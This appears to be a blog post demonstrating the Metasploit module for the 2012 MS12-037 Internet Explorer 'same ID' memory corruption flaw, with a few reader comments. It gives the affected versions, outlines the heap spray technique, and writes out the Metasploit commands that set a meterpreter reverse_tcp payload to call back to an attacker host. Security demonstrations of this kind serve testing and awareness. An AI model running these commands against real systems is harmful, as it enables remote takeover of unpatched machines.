Vulnerability found exploited in the wild
Public release of the vulnerability the 2012-06-12
Metasploit PoC provided the 2012-06-13
PoC provided by :
Qihoo 360 Security Center
Affected version(s) :
Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Internet Explorer 9
Tested on Windows XP Pro SP3 with :
Internet Explorer 8 (8.0.6001.18702) and msvcrt ROP
This module exploits a memory corruption flaw in Internet Explorer 8 when handling objects with the same ID property. At the moment this module targets IE8 over Windows XP SP3 through the heap massaging plus heap spray as exploited in the wild.
use exploit/windows/browser/ms12_037_same_id set SRVHOST 192.168.178.100 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit sysinfo getuid
3 thoughts on “MS12-037 Internet Explorer Same ID Vulnerability Metasploit Demo”
Are you sure that you have remove KB2699988 how is MS12-037 patch ?
exploit is not running
i tested a XP SP3 on Internet Explorer 8 (8.0.6001.18702)
what is this msvcrt ROP ?
My IE8 is crashed.
Another reason to ditch Windows XP and/or use EMET 2.0 🙂
Comments are closed.